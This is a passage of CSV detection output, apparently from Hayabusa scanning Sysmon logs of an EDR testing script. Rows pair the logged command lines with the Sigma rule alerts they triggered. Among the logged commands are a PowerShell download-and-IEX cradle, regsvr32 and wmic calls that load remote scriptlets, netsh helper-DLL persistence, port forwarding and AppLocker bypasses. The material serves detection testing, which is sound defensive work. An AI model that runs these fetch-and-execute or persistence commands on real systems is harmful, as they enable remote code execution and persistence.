Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 